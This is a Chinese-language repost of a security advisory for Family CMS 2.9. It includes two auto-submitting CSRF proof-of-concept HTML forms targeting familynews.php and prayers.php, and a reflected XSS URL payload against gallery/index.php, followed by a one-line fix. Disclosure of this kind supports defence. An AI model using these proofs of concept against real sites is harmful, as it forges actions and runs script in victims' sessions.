好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

Family CMS 2.9及更早版本的多个缺陷及修复 - 网站安

标题: Family CMS 2.9  and earlier multiple Vulnerabilities 下载 地址:http://sourceforge.net/projects/fam-connections/files/Family%20Connections/2.9/FCMS_2.9.zip/download 作者: Ahmed Elhady Mohamed HdhCmsTest2cto测试数据 ahmed.elhady.mohamed@gmail测试数据 影响版本: 2.9 测试系统平台: ubuntu 11.4 =================================================================================== 提示:     *****First we must install all optional sections during installation process.*****                 1- CSRF缺陷 :       POC 1: Page "familynews.php"                           < html >             <head>                 <script type="text/javascript">                     function autosubmit() {                         document.getElementById('ChangeSubmit').submit();                     }                 </script>             </head>             <body  onLoad="autosubmit()">                 <form method="POST"  action="http://[ HdhCmsTest2cto测试数据 ]/FCMS_2.9/familynews.php"  id="ChangeSubmit">                     <input type="hidden"  name="title"  value="test" />                     <input type="hidden"  name="submitadd"  value="Add" />                     <input type="hidden"  name="post"  value="testcsrf" />                     <input type="submit" value="submit"/>                 </form>             </body>         </html>            --------------------------------------------------------------------------------------------------------               POC 2:页面 "prayers.php"                      <html>         <head>             <script type="text/javascript">                 function autosubmit() {                     document.getElementById('ChangeSubmit').submit();                 }             </script>         </head>         <body  onLoad="autosubmit()">             <form method="POST"  action="http://[localhost]/FCMS_2.9/prayers.php" id="ChangeSubmit">                 <input type="hidden"  name="for"  value="test" />                 <input type="hidden"  name="submitadd"  value="Add" />                 <input type="hidden"  name="desc"  value="testtest" />                 <input type="submit" value="submit"/>             </form>                   </body>         </html> ---------------------------------------------------------------------------------------------------------------------------- 2-反射型 XSS          POC :   http://[localhost]/fcms_2.9/gallery/index.php?uid=%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E   修复:加强过滤和验证

查看更多关于Family CMS 2.9及更早版本的多个缺陷及修复 - 网站安的详细内容...

  阅读:39次